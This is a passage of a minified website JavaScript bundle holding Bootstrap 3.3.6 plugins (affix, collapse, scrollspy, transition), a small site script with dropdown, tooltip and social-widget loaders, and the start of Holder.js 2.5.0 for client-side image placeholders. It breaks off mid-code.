e=this.$element.offset();return(this.pinnedOffset=e.top-f)};b.prototype.checkPositionWithEventLoop=function(){setTimeout(a.proxy(this.checkPosition,this),1)};b.prototype.checkPosition=function(){if(!this.$element.is(":visible")){return}var i=this.$element.height();var j=this.options.offset;var l=j.top;var k=j.bottom;var m=Math.max(a(document).height(),a(document.body).height());if(typeof j!="object"){k=l=j}if(typeof l=="function"){l=j.top(this.$element)}if(typeof k=="function"){k=j.bottom(this.$element)}var f=this.getState(m,i,l,k);if(this.affixed!=f){if(this.unpin!=null){this.$element.css("top","")}var g="affix"+(f?"-"+f:"");var h=a.Event(g+".bs.affix");this.$element.trigger(h);if(h.isDefaultPrevented()){return}this.affixed=f;this.unpin=f=="bottom"?this.getPinnedOffset():null;this.$element.removeClass(b.RESET).addClass(g).trigger(g.replace("affix","affixed")+".bs.affix")}if(f=="bottom"){this.$element.offset({top:m-i-k})}};function d(e){return this.each(function(){var f=a(this);var g=f.data("bs.affix");var h=typeof e=="object"&&e;if(!g){f.data("bs.affix",(g=new b(this,h)))}if(typeof e=="string"){g[e]()}})}var c=a.fn.affix;a.fn.affix=d;a.fn.affix.Constructor=b;a.fn.affix.noConflict=function(){a.fn.affix=c;return this};a(window).on("load",function(){a('[data-spy="affix"]').each(function(){var e=a(this);var f=e.data();f.offset=f.offset||{};if(f.offsetBottom!=null){f.offset.bottom=f.offsetBottom}if(f.offsetTop!=null){f.offset.top=f.offsetTop}d.call(e,f)})})}(jQuery);+function(a){var b=function(f,g){this.$element=a(f);this.options=a.extend({},b.DEFAULTS,g);this.$trigger=a('[data-toggle="collapse"][href="#'+f.id+'"],[data-toggle="collapse"][data-target="#'+f.id+'"]');this.transitioning=null;if(this.options.parent){this.$parent=this.getParent()}else{this.addAriaAndCollapsedClass(this.$element,this.$trigger)}if(this.options.toggle){this.toggle()}};b.VERSION="3.3.6";b.TRANSITION_DURATION=350;b.DEFAULTS={toggle:true};b.prototype.dimension=function(){var f=this.$element.hasClass("width");return f?"width":"height"};b.prototype.show=function(){if(this.transitioning||this.$element.hasClass("in")){return}var g;var f=this.$parent&&this.$parent.children(".panel").children(".in, .collapsing");if(f&&f.length){g=f.data("bs.collapse");if(g&&g.transitioning){return}}var k=a.Event("show.bs.collapse");this.$element.trigger(k);if(k.isDefaultPrevented()){return}if(f&&f.length){e.call(f,"hide");g||f.data("bs.collapse",null)}var i=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[i](0).attr("aria-expanded",true);this.$trigger.removeClass("collapsed").attr("aria-expanded",true);this.transitioning=1;var h=function(){this.$element.removeClass("collapsing").addClass("collapse in")[i]("");this.transitioning=0;this.$element.trigger("shown.bs.collapse")};if(!a.support.transition){return h.call(this)}var j=a.camelCase(["scroll",i].join("-"));this.$element.one("bsTransitionEnd",a.proxy(h,this)).emulateTransitionEnd(b.TRANSITION_DURATION)[i](this.$element[0][j])};b.prototype.hide=function(){if(this.transitioning||!this.$element.hasClass("in")){return}var h=a.Event("hide.bs.collapse");this.$element.trigger(h);if(h.isDefaultPrevented()){return}var g=this.dimension();this.$element[g](this.$element[g]())[0].offsetHeight;this.$element.addClass("collapsing").removeClass("collapse in").attr("aria-expanded",false);this.$trigger.addClass("collapsed").attr("aria-expanded",false);this.transitioning=1;var f=function(){this.transitioning=0;this.$element.removeClass("collapsing").addClass("collapse").trigger("hidden.bs.collapse")};if(!a.support.transition){return f.call(this)}this.$element[g](0).one("bsTransitionEnd",a.proxy(f,this)).emulateTransitionEnd(b.TRANSITION_DURATION)};b.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()};b.prototype.getParent=function(){return a(this.options.parent).find('[data-toggle="collapse"][data-parent="'+this.options.parent+'"]').each(a.proxy(function(h,g){var f=a(g);this.addAriaAndCollapsedClass(c(f),f)},this)).end()};b.prototype.addAriaAndCollapsedClass=function(f,g){var h=f.hasClass("in");f.attr("aria-expanded",h);g.toggleClass("collapsed",!h).attr("aria-expanded",h)};function c(f){var g;var h=f.attr("data-target")||(g=f.attr("href"))&&g.replace(/.*(?=#[^\s]+$)/,"");return a(h)}function e(f){return this.each(function(){var g=a(this);var h=g.data("bs.collapse");var i=a.extend({},b.DEFAULTS,g.data(),typeof f=="object"&&f);if(!h&&i.toggle&&/show|hide/.test(f)){i.toggle=false}if(!h){g.data("bs.collapse",(h=new b(this,i)))}if(typeof f=="string"){h[f]()}})}var d=a.fn.collapse;a.fn.collapse=e;a.fn.collapse.Constructor=b;a.fn.collapse.noConflict=function(){a.fn.collapse=d;return this};a(document).on("click.bs.collapse.data-api",'[data-toggle="collapse"]',function(i){var g=a(this);if(!g.attr("data-target")){i.preventDefault()}var f=c(g);var h=f.data("bs.collapse");var j=h?"toggle":g.data();e.call(f,j)})}(jQuery);+function(a){function d(e,f){this.$body=a(document.body);this.$scrollElement=a(e).is(document.body)?a(window):a(e);this.options=a.extend({},d.DEFAULTS,f);this.selector=(this.options.target||"")+" .nav li > a";this.offsets=[];this.targets=[];this.activeTarget=null;this.scrollHeight=0;this.$scrollElement.on("scroll.bs.scrollspy",a.proxy(this.process,this));this.refresh();this.process()}d.VERSION="3.3.6";d.DEFAULTS={offset:10};d.prototype.getScrollHeight=function(){return this.$scrollElement[0].scrollHeight||Math.max(this.$body[0].scrollHeight,document.documentElement.scrollHeight)};d.prototype.refresh=function(){var g=this;var f="offset";var e=0;this.offsets=[];this.targets=[];this.scrollHeight=this.getScrollHeight();if(!a.isWindow(this.$scrollElement[0])){f="position";e=this.$scrollElement.scrollTop()}this.$body.find(this.selector).map(function(){var h=a(this);var j=h.data("target")||h.attr("href");var i=/^#./.test(j)&&a(j);return(i&&i.length&&i.is(":visible")&&[[i[f]().top+e,j]])||null}).sort(function(h,i){return h[0]-i[0]}).each(function(){g.offsets.push(this[0]);g.targets.push(this[1])})};d.prototype.process=function(){var k=this.$scrollElement.scrollTop()+this.options.offset;var j=this.getScrollHeight();var g=this.options.offset+j-this.$scrollElement.height();var h=this.offsets;var l=this.targets;var e=this.activeTarget;var f;if(this.scrollHeight!=j){this.refresh()}if(k>=g){return e!=(f=l[l.length-1])&&this.activate(f)}if(e&&k<h[0]){this.activeTarget=null;return this.clear()}for(f=h.length;f--;){e!=l[f]&&k>=h[f]&&(h[f+1]===undefined||k<h[f+1])&&this.activate(l[f])}};d.prototype.activate=function(g){this.activeTarget=g;this.clear();var f=this.selector+'[data-target="'+g+'"],'+this.selector+'[href="'+g+'"]';var e=a(f).parents("li").addClass("active");if(e.parent(".dropdown-menu").length){e=e.closest("li.dropdown").addClass("active")}e.trigger("activate.bs.scrollspy")};d.prototype.clear=function(){a(this.selector).parentsUntil(this.options.target,".active").removeClass("active")};function c(e){return this.each(function(){var f=a(this);var g=f.data("bs.scrollspy");var h=typeof e=="object"&&e;if(!g){f.data("bs.scrollspy",(g=new d(this,h)))}if(typeof e=="string"){g[e]()}})}var b=a.fn.scrollspy;a.fn.scrollspy=c;a.fn.scrollspy.Constructor=d;a.fn.scrollspy.noConflict=function(){a.fn.scrollspy=b;return this};a(window).on("load.bs.scrollspy.data-api",function(){a('[data-spy="scroll"]').each(function(){var e=a(this);c.call(e,e.data())})})}(jQuery);+function(a){function b(){var c=document.createElement("bootstrap");var e={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var d in e){if(c.style[d]!==undefined){return{end:e[d]}}}return false}a.fn.emulateTransitionEnd=function(f){var e=false;var c=this;a(this).one("bsTransitionEnd",function(){e=true});var d=function(){if(!e){a(c).trigger(a.support.transition.end)}};setTimeout(d,f);return this};a(function(){a.support.transition=b();if(!a.support.transition){return}a.event.special.bsTransitionEnd={bindType:a.support.transition.end,delegateType:a.support.transition.end,handle:function(c){if(a(c.target).is(this)){return c.handleObj.handler.apply(this,arguments)}}}})}(jQuery); /* Site - (c) 2014 Nigel Morris Provided under the MIT License. Commercial use requires attribution. */ $(document).ready(function(){$(".dropdown-toggle").dropdown();$(".dropdown-menu").mouseleave(function(){$(".dropdown").removeClass("open")});$(".dropdown").on("show.bs.dropdown",function(a){$(this).find(".dropdown-menu").first().stop(true,true).slideDown()});$(".dropdown").on("hide.bs.dropdown",function(a){$(this).find(".dropdown-menu").first().stop(true,true).slideUp()});$("#nav-wrapper").height($("#nav").height());$("#nav").affix({offset:$("#nav").position()});$("#nav").on("affix.bs.affix",function(){alert("Fired!")});$('a[rel="external"]').click(function(){window.open($(this).attr("href"));return false});$("#primarymenu").on("affixed-top.bs.affix",function(){$("#logo-sm").fadeOut(300,function(){$("#logo-sm").addClass("hide")})});$("#primarymenu").on("affixed.bs.affix",function(){$("#logo-sm").fadeIn(300,function(){$("#logo-sm").removeClass("hide")})})});$(function(){$("ul.thumbnails li a").tooltip();if(!window.matchMedia||(window.matchMedia("(min-width:600px)").matches)){$("#header-nav li a").tooltip()}});$(function(){if($("#twtr-widget").length>0){var b=$("#twtr-widget").attr("data-user");var a="//api.twitter.com/1/statuses/user_timeline/"+b+".json?callback=twitterCallback2&count=3&include_rts=t";$.getScript(a,function(){console.log("Twitter widget was loaded.")})}});function twitterCallback2(d){var c=[];for(var a=0;a<d.length;a++){var e=d[a].user.screen_name;var b=d[a].text.replace(/((https?|s?ftp|ssh)\:\/\/[^"\s\<\>]*[^.,;'">\:\s\<\>\)\]\!])/g,function(f){return'<a href="'+f+'">'+f+"</a>"}).replace(/\B@([_a-z0-9]+)/ig,function(f){return f.charAt(0)+'<a href="http://twitter.com/'+f.substring(1)+'">'+f.substring(1)+"</a>"});c.push("<li><span>"+b+'</span> <a class="label" href="http://twitter.com/'+e+"/statuses/"+d[a].id_str+'">'+relative_time(d[a].created_at)+"</a><hr/></li>")}document.getElementById("twtr-widget").innerHTML=c.join("")}function relative_time(d){var e=d.split(" ");d=e[1]+" "+e[2]+", "+e[5]+" "+e[3];var b=Date.parse(d);var c=(arguments.length>1)?arguments[1]:new Date();var a=parseInt((c.getTime()-b)/1000);a=a+(c.getTimezoneOffset()*60);if(a<60){return"less than a minute ago"}else{if(a<120){return"about a minute ago"}else{if(a<(60*60)){return(parseInt(a/60)).toString()+" minutes ago"}else{if(a<(120*60)){return"about an hour ago"}else{if(a<(24*60*60)){return"about "+(parseInt(a/3600)).toString()+" hours ago"}else{if(a<(48*60*60)){return"1 day ago"}else{return(parseInt(a/86400)).toString()+" days ago"}}}}}}}$(function(){if($("div.g-plusone").length>0){var a=$("div.g-plusone").attr("data-lang");$.getScript("//apis.google.com/js/plusone.js",function(){window.___gcfg={lang:a};console.log("Google+ widget was loaded.")})}});$(function(){if($("div.fb-like").length>0){var a=document.createElement("script");a.async=true;a.src="//connect.facebook.net/"+$("#fb-root").attr("data-lang")+"/all.js#xfbml=1";document.getElementById("fb-root").appendChild(a)}});$(function(){if($("form.validate").length>0){var b=$.data($("form.validate")[0],"validator");var a=b.settings;a.highlight=function(c){$(c).parents("div.control-group").addClass("error")};a.unhighlight=function(c){$(c).parents("div.control-group").removeClass("error")}}});function animationHover(b,a){b=$(b);b.hover(function(){b.addClass("animated "+a)},function(){window.setTimeout(function(){b.removeClass("animated "+a)},2000)})}function animationClick(b,a){b=$(b);b.click(function(){b.addClass("animated "+a);window.setTimeout(function(){b.removeClass("animated "+a)},2000)})}$(window).load(function(){$("img").each(function(){if(!this.complete||typeof this.naturalWidth=="undefined"||this.naturalWidth==0){this.src="/assets/gfx/placeholder_thumb_360.jpg"}})}); /* Holder - client side image placeholders Version 2.5.0+1qnmg © 2015 Ivan Malopinsky - http://imsky.co Site: http://imsky.github.io/holder Issues: https://github.com/imsky/holder/issues License: http://opensource.org/licenses/MIT */ !function(d,e,f){e[d]=f}("onDomReady",this,function(A){function B(b){if(!V){if(!G.body){return E(B)}for(V=!0;b=W.shift();){E(b)}}}function C(b){(T||b.type===I||G[M]===L)&&(D(),B())}function D(){T?(G[S](Q,C,J),A[S](I,C,J)):(G[O](R,C),A[O](K,C))}function E(c,d){setTimeout(c,+d>=0?d:1)}function F(b){V?E(b):W.push(b)}null==document.readyState&&document.addEventListener&&(document.addEventListener("DOMContentLoaded",function Y(){document.removeEventListener("DOMContentLoaded",Y,!1),document.readyState="complete"},!1),document.readyState="loading");var G=A.document,H=G.documentElement,I="load",J=!1,K="on"+I,L="complete",M="readyState",N="attachEvent",O="detachEvent",P="addEventListener",Q="DOMContentLoaded",R="onreadystatechange",S="removeEventListener",T=P in G,U=J,V=J,W=[];if(G[M]===L){E(B)}else{if(T){G[P](Q,C,J),A[P](I,C,J)}else{G[N](R,C),A[N](K,C);try{U=null==A.frameElement&&H}catch(X){}U&&U.doScroll&&!function Z(){if(!V){try{U.doScroll("left")}catch(b){return E(Z,50)}D(),B()}}()}}return F.version="1.4.0",F.isReady=function(){return V},F}(this)),document.querySelectorAll||(document.querySelectorAll=function(e){var f,g=document.createElement("style"),h=[];for(document.documentElement.firstChild.appendChild(g),document._qsa=[],g.styleSheet.cssText=e+"{x-qsa:expression(document._qsa && document._qsa.push(this))}",window.scrollBy(0,0),g.parentNode.removeChild(g);document._qsa.length;){f=document._qsa.shift(),f.style.removeAttribute("x-qsa"),h.push(f)}return document._qsa=null,h}),document.querySelector||(document.querySelector=function(c){var d=document.querySelectorAll(c);return d.length?d[0]:null}),document.getElementsByClassName||(document.getElementsByClassName=function(b){return b=String(b).replace(/^|\s+/g,"."),document.querySelectorAll(b)}),Object.keys||(Object.keys=function(d){if(d!==Object(d)){throw TypeError("Object.keys called on non-object")}var e,f=[];for(e in d){Object.prototype.hasOwnProperty.call(d,e)&&f.push(e)}return f}),function(c){var d="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";c.atob=c.atob||function(b){b=String(b);var h,i=0,j=[],k=0,l=0;if(b=b.replace(/\s/g,""),b.length%4===0&&(b=b.replace(/=+$/,"")),b.length%4===1){throw Error("InvalidCharacterError")}if(/[^+/0-9A-Za-z]/.test(b)){throw Error("InvalidCharacterError")}for(;i<b.length;){h=d.indexOf(b.charAt(i)),k=k<<6|h,l+=6,24===l&&(j.push(String.fromCharCode(k>>16&255)),j.push(String.fromCharCode(k>>8&255)),j.push(String.fromCharCode(255&k)),l=0,k=0),i+=1}return 12===l?(k>>=4,j.push(String.fromCharCode(255&k))):18===l&&(k>>=2,j.push(String.fromCharCode(k>>8&255)),j.push(String.fromCharCode(255&k))),j.join("")},c.btoa=c.btoa||function(b){b=String(b);var l,m,n,o,p,q,r,s=0,t=[];if(/[^\x00-\xFF]/.test(b)){throw Error("InvalidCharacterError")}for(;s<b.length;){l=b.charCodeAt(s++),m=b.charCodeAt(s++),n=b.charCodeAt(s++),o=l>>2,p=(3&l)<<4|m>>4,q=(15&m)<<2|n>>6,r=63&n,s===b.length+2?(q=64,r=64):s===b.length+1&&(r=64),t.push(d.charAt(o),d.charAt(p),d.charAt(q),d.charAt(r))}return t.join("")}}(this),Object.prototype.hasOwnProperty||(Object.prototype.hasOwnProperty=function(c){var d=this.__proto__||this.constructor.prototype;return c in this&&(!(c in d)||d[c]!==this[c])}),window.requestAnimationFrame||(window.webkitRequestAnimationFrame?!function(b){b.requestAnimationFrame=function(c){return webkitRequestAnimationFrame(function(){c(performance.now())})},b.cancelAnimationFrame=webkitCancelAnimationFrame}(this):window.mozRequestAnimationFrame&&!function(b){b.requestAnimationFrame=function(c){return mozRequestAnimationFrame(function(){c(performance.now())})},b.cancelAnimationFrame=mozCancelAnimationFrame}(this)),function(c,d){c.augment=d()}(this,function(){var d=function(){},e=Array.prototype.slice,f=function(a,b){var j=d.prototype="function"==typeof a?a.prototype:a,k=new d,l=b.apply(k,e.call(arguments,2).concat(j));if("object"==typeof l){for(var m in l){k[m]=l[m]}}if(!k.hasOwnProperty("constructor")){return k}var n=k.constructor;return n.prototype=k,n};return f.defclass=function(c){var g=c.constructor;return g.prototype=c,g},f.extend=function(c,g){return f(c,function(b){return this.uber=b,g})},f}),function(M,O){function Q(d,e,h,i){var j=S(h.substr(h.lastIndexOf(d.domain)),d);j&&U({mode:null,el:i,flags:j,engineSettings:e})}function S(o,p){for(var q={theme:aq(Z.settings.themes.gray,null),stylesheets:p.stylesheets,holderURL:[]},r=!1,s=String.fromCharCode(11),t=o.replace(/([^\\])\//g,"$1"+s).split(s),u=/%[0-9a-f]{2}/gi,v=t.length,w=0;v>w;w++){var x=t[w];if(x.match(u)){try{x=decodeURIComponent(x)}catch(y){x=t[w]}}var z=!1;if(Z.flags.dimensions.match(x)){r=!0,q.dimensions=Z.flags.dimensions.output(x),z=!0}else{if(Z.flags.fluid.match(x)){r=!0,q.dimensions=Z.flags.fluid.output(x),q.fluid=!0,z=!0}else{if(Z.flags.textmode.match(x)){q.textmode=Z.flags.textmode.output(x),z=!0}else{if(Z.flags.colors.match(x)){var A=Z.flags.colors.output(x);q.theme=aq(q.theme,A),z=!0}else{if(p.themes[x]){p.themes.hasOwnProperty(x)&&(q.theme=aq(p.themes[x],null)),z=!0}else{if(Z.flags.font.match(x)){q.font=Z.flags.font.output(x),z=!0}else{if(Z.flags.auto.match(x)){q.auto=!0,z=!0}else{if(Z.flags.text.match(x)){q.text=Z.flags.text.output(x),z=!0}else{if(Z.flags.size.match(x)){q.size=Z.flags.size.output(x),z=!0}else{if(Z.flags.random.match(x)){null==Z.vars.cache.themeKeys&&(Z.vars.cache.themeKeys=Object.keys(p.themes));var B=Z.vars.cache.themeKeys[0|Math.random()*Z.vars.cache.themeKeys.length];q.theme=aq(p.themes[B],null),z=!0}}}}}}}}}}z&&q.holderURL.push(x)}return q.holderURL.unshift(p.domain),q.holderURL=q.holderURL.join("/"),r?q:!1}function U(f){var i=f.mode,j=f.el,p=f.flags,r=f.engineSettings,s=p.dimensions,t=p.theme,u=s.width+"x"+s.height;if(i=null==i?p.fluid?"fluid":"image":i,null!=p.text&&(t.text=p.text,"object"===j.nodeName.toLowerCase())){for(var v=t.text.split("\\n"),w=0;w<v.length;w++){v[w]=ax(v[w])}t.text=v.join("\\n")}var x=p.holderURL,y=aq(r,null);p.font&&(t.font=p.font,!y.noFontFallback&&"img"===j.nodeName.toLowerCase()&&Z.setup.supportsCanvas&&"svg"===y.renderer&&(y=aq(y,{renderer:"canvas"}))),p.font&&"canvas"==y.renderer&&(y.reRender=!0),"background"==i?null==j.getAttribute("data-background-src")&&an(j,{"data-background-src":x}):an(j,{"data-src":x}),p.theme=t,j.holderData={flags:p,engineSettings:y},("image"==i||"fluid"==i)&&an(j,{alt:t.text?t.text+" ["+u+"]":u});var z={mode:i,el:j,holderSettings:{dimensions:s,theme:t,flags:p},engineSettings:y};"image"==i?("html"!=y.renderer&&p.auto||(j.style.width=s.width+"px",j.style.height=s.height+"px"),"html"==y.renderer?j.style.backgroundColor=t.background:(W(z),"exact"==p.textmode&&(j.holderData.resizeUpdate=!0,Z.vars.resizableImages.push(j),ac(j)))):"background"==i&&"html"!=y.renderer?W(z):"fluid"==i&&(j.holderData.resizeUpdate=!0,"%"==s.height.slice(-1)?j.style.height=s.height:null!=p.auto&&p.auto||(j.style.height=s.height+"px"),"%"==s.width.slice(-1)?j.style.width=s.width:null!=p.auto&&p.auto||(j.style.width=s.width+"px"),("inline"==j.style.display||""===j.style.display||"none"==j.style.display)&&(j.style.display="block"),ae(j),"html"==y.renderer?j.style.backgroundColor=t.background:(Z.vars.resizableImages.push(j),ac(j)))}function W(b){function g(){var a=null;switch(p.renderer){case"canvas":a=ad(r,b);break;case"svg":a=af(r,b);break;default:throw"Holder: invalid renderer: "+p.renderer}return a}var l=null,m=b.mode,n=b.holderSettings,o=b.el,p=b.engineSettings;switch(p.renderer){case"svg":if(!Z.setup.supportsSVG){return}break;case"canvas":if(!Z.setup.supportsCanvas){return}break;default:return}var q={width:n.dimensions.width,height:n.dimensions.height,theme:n.theme,flags:n.flags},r=Y(q);if(l=g(),null==l){throw"Holder: couldn't render placeholder"}"background"==m?(o.style.backgroundImage="url("+l+")",o.style.backgroundSize=q.width+"px "+q.height+"px"):("img"===o.nodeName.toLowerCase()?an(o,{src:l}):"object"===o.nodeName.toLowerCase()&&(an(o,{data:l}),an(o,{type:"image/svg+xml"})),p.reRender&&O.setTimeout(function(){var c=g();if(null==c){throw"Holder: couldn't render placeholder"}"img"===o.nodeName.toLowerCase()?an(o,{src:c}):"object"===o.nodeName.toLowerCase()&&(an(o,{data:c}),an(o,{type:"image/svg+xml"}))},100)),an(o,{"data-holder-rendered":!0})}function Y(h){function t(e,f,g,i){f.width=g,f.height=i,e.width=Math.max(e.width,f.width),e.height+=f.height,e.add(f)}var u=Z.defaults.size;switch(parseFloat(h.theme.size)?u=h.theme.size:parseFloat(h.flags.size)&&(u=h.flags.size),h.font={family:h.theme.font?h.theme.font:"Arial, Helvetica, Open Sans, sans-serif",size:aa(h.width,h.height,u),units:h.theme.units?h.theme.units:Z.defaults.units,weight:h.theme.fontweight?h.theme.fontweight:"bold"},h.text=h.theme.text?h.theme.text:Math.floor(h.width)+"x"+Math.floor(h.height),h.flags.textmode){case"literal":h.text=h.flags.dimensions.width+"x"+h.flags.dimensions.height;break;case"exact":if(!h.flags.exactDimensions){break}h.text=Math.floor(h.flags.exactDimensions.width)+"x"+Math.floor(h.flags.exactDimensions.height)}var v=new ah({width:h.width,height:h.height}),w=v.Shape,x=new w.Rect("holderBg",{fill:h.theme.background});x.resize(h.width,h.height),v.root.add(x);var y=new w.Group("holderTextGroup",{text:h.text,align:"center",font:h.font,fill:h.theme.foreground});y.moveTo(null,null,1),v.root.add(y);var z=y.textPositionData=ab(v);if(!z){throw"Holder: staging fallback not supported yet."}y.properties.leading=z.boundingBox.height;var A=null,B=null;if(z.lineCount>1){var C=0,D=0,E=h.width*Z.setup.lineWrapRatio,F=0;B=new w.Group("line"+F);for(var G=0;G<z.words.length;G++){var H=z.words[G];A=new w.Text(H.text);var I="\\n"==H.text;(C+H.width>=E||I===!0)&&(t(y,B,C,y.properties.leading),C=0,D+=y.properties.leading,F+=1,B=new w.Group("line"+F),B.y=D),I!==!0&&(A.moveTo(C,0),C+=z.spaceWidth+H.width,B.add(A))}t(y,B,C,y.properties.leading);for(var J in y.children){B=y.children[J],B.moveTo((y.width-B.width)/2,null,null)}y.moveTo((h.width-y.width)/2,(h.height-y.height)/2,null),(h.height-y.height)/2<0&&y.moveTo(null,0,null)}else{A=new w.Text(h.text),B=new w.Group("line0"),B.add(A),y.add(B),y.moveTo((h.width-z.boundingBox.width)/2,(h.height-z.boundingBox.height)/2,null)}return v}function aa(i,j,k){var l=parseInt(i,10),m=parseInt(j,10),n=Math.max(l,m),o=Math.min(l,m),p=0.8*Math.min(o,n*Z.defaults.scale);return Math.round(Math.max(k,p))}function ac(f){var k;k=null==f||null==f.nodeType?Z.vars.resizableImages:[f];for(var l=0,m=k.length;m>l;l++){var n=k[l];if(n.holderData){var o=n.holderData.flags,p=ag(n);if(p){if(!n.holderData.resizeUpdate){continue}if(o.fluid&&o.auto){var q=n.holderData.fluidConfig;switch(q.mode){case"width":p.height=p.width/q.ratio;break;case"height":p.width=p.height*q.ratio}}var r={mode:"image",holderSettings:{dimensions:p,theme:o.theme,flags:o},el:n,engineSettings:n.holderData.engineSettings};"exact"==o.textmode&&(o.exactDimensions=p,r.holderSettings.dimensions=o.dimensions),W(r)}else{al(n)}}}}function ae(e){if(e.holderData){var f=ag(e);if(f){var g=e.holderData.flags,h={fluidHeight:"%"==g.dimensions.height.slice(-1),fluidWidth:"%"==g.dimensions.width.slice(-1),mode:null,initialDimensions:f};h.fluidWidth&&!h.fluidHeight?(h.mode="width",h.ratio=h.initialDimensions.width/parseFloat(g.dimensions.height)):!h.fluidWidth&&h.fluidHeight&&(h.mode="height",h.ratio=parseFloat(g.dimensions.width)/h.initialDimensions.height),e.holderData.fluidConfig=h}else{al(e)}}}function ag(c){var d={height:c.clientHeight,width:c.clientWidth};return d.height&&d.width?d:!1}function ai(){for(var b,g=[],h=Object.keys(Z.vars.invisibleImages),i=0,j=h.length;j>i;i++){b=Z.vars.invisibleImages[h[i]],ag(b)&&"img"==b.nodeName.toLowerCase()&&(g.push(b),delete Z.vars.invisibleImages[h[i]])}g.length&&X.run({images:g}),O.requestAnimationFrame(ai)}function ak(){Z.vars.visibilityCheckStarted||(O.requestAnimationFrame(ai),Z.vars.visibilityCheckStarted=!0)}function al(b){b.holderData.invisibleId||(Z.vars.invisibleId+=1,Z.vars.invisibleImages["i"+Z.vars.invisibleId]=b,b.holderData.invisibleId=Z.vars.invisibleId)}function am(c,d){return null==d?R.createElement(c):R.createElementNS(d,c)}function an(d,e){for(var f in e){d.setAttribute(f,e[f])}}function ao(f,g,h){if(null==f){f=am("svg",N);var i=am("defs",N);f.appendChild(i)}f.webkitMatchesSelector&&f.setAttribute("xmlns",N);for(var j=0;j<f.childNodes.length;j++){f.childNodes[j].nodeType===P&&f.removeChild(f.childNodes[j])}return an(f,{width:g,height:h,viewBox:"0 0 "+g+" "+h,preserveAspectRatio:"none"}),f}function ap(b,l){if(O.XMLSerializer){var m=new XMLSerializer,n="",o=l.stylesheets;b.querySelector("defs");if(l.svgXMLStylesheet){for(var p=(new DOMParser).parseFromString("<xml />","application/xml"),q=o.length-1;q>=0;q--){var r=p.createProcessingInstruction("xml-stylesheet",'href="'+o[q]+'" rel="stylesheet"');p.insertBefore(r,p.firstChild)}var s=p.createProcessingInstruction("xml",'version="1.0" encoding="UTF-8" standalone="yes"');p.insertBefore(s,p.firstChild),p.removeChild(p.documentElement),n=m.serializeToString(p)}var t=m.serializeToString(b);return t=t.replace(/\&amp;(\#[0-9]{2,}\;)/g,"&$1"),n+t}}function aq(f,g){var h={};for(var i in f){f.hasOwnProperty(i)&&(h[i]=f[i])}if(null!=g){for(var j in g){g.hasOwnProperty(j)&&(h[j]=g[j])}}return h}function ar(d){var e=[];for(var f in d){d.hasOwnProperty(f)&&e.push(f+":"+d[f])}return e.join(";")}function at(b){Z.vars.debounceTimer||b.call(this),Z.vars.debounceTimer&&O.clearTimeout(Z.vars.debounceTimer),Z.vars.debounceTimer=O.setTimeout(function(){Z.vars.debounceTimer=null,b.call(this)},Z.setup.debounce)}function au(){at(function(){ac(null)})}function av(b){var d=null;return"string"==typeof b?d=R.querySelectorAll(b):O.NodeList&&b instanceof O.NodeList?d=b:O.Node&&b instanceof O.Node?d=[b]:O.HTMLCollection&&b instanceof O.HTMLCollection?d=b:b instanceof Array?d=b:null===b&&(d=[]),d}function aw(d,e){var f=new Image;f.onerror=function(){e.call(this,!1)},f.onload=function(){e.call(this,!0)},f.src=d}function ax(e){for(var f=[],g=0,h=e.length-1;h>=0;h--){g=e.charCodeAt(h),f.unshift(g>128?["&#",g,";"].join(""):e[h])}return f.join("")}function ay(b){return b.replace(/&#(\d+);/g,function(c,d){return String.fromCharCode(d)})}var N="http://www.w3.org/2000/svg",P=8,R=O.document,T="2.5.0",V="\nCreated with Holder.js "+T+".\nLearn more at http://holderjs.com\n(c) 2012-2015 Ivan Malopinsky - http://imsky.co\n",X={version:T,addTheme:function(c,d){return null!=c&&null!=d&&(Z.settings.themes[c]=d),delete Z.vars.cache.themeKeys,this},addImage:function(g,h){var i=R.querySelectorAll(h);if(i.length){for(var j=0,k=i.length;k>j;j++){var l=am("img");an(l,{"data-src":g}),i[j].appendChild(l)}}return this},setResizeUpdate:function(c,d){c.holderData&&(c.holderData.resizeUpdate=!!d,c.holderData.resizeUpdate&&ac(c))},run:function(b){b=b||{};var w={};Z.vars.preempted=!0;var G=aq(Z.settings,b);w.renderer=G.renderer?G.renderer:Z.setup.renderer,-1===Z.setup.renderers.join(",").indexOf(w.renderer)&&(w.renderer=Z.setup.supportsSVG?"svg":Z.setup.supportsCanvas?"canvas":"html");var az=av(G.images),aB=av(G.bgnodes),aD=av(G.stylenodes),aF=av(G.objects);w.stylesheets=[],w.svgXMLStylesheet=!0,w.noFontFallback=G.noFontFallback?G.noFontFallback:!1;for(var aH=0;aH<aD.length;aH++){var aJ=aD[aH];if(aJ.attributes.rel&&aJ.attributes.href&&"stylesheet"==aJ.attributes.rel.value){var aL=aJ.attributes.href.value,aM=am("a");aM.href=aL;var aN=aM.protocol+"//"+aM.host+aM.pathname+aM.search;w.stylesheets.push(aN)}}for(aH=0;aH<aB.length;aH++){if(O.getComputedStyle){var aO=O.getComputedStyle(aB[aH],null).getPropertyValue("background-image"),aP=aB[aH].getAttribute("data-background-src"),aQ=null;aQ=null==aP?aO:aP;var aR=null,aS="?"+G.domain+"/";if(0===aQ.indexOf(aS)){aR=aQ.slice(1)}else{if(-1!=aQ.indexOf(aS)){var aT=aQ.substr(aQ.indexOf(aS)).slice(1),c=aT.match(/([^\"]*)"?\)/);null!=c&&(aR=c[1])}}if(null!=aR){var d=S(aR,G);d&&U({mode:"background",el:aB[aH],flags:d,engineSettings:w})}}}for(aH=0;aH<aF.length;aH++){var e=aF[aH],o={};try{o.data=e.getAttribute("data"),o.dataSrc=e.getAttribute("data-src")}catch(s){}var x=null!=o.data&&0===o.data.indexOf(G.domain),aA=null!=o.dataSrc&&0===o.dataSrc.indexOf(G.domain);x?Q(G,w,o.data,e):aA&&Q(G,w,o.dataSrc,e)}for(aH=0;aH<az.length;aH++){var aC=az[aH],aE={};try{aE.src=aC.getAttribute("src"),aE.dataSrc=aC.getAttribute("data-src"),aE.rendered=aC.getAttribute("data-holder-rendered")}catch(s){}var 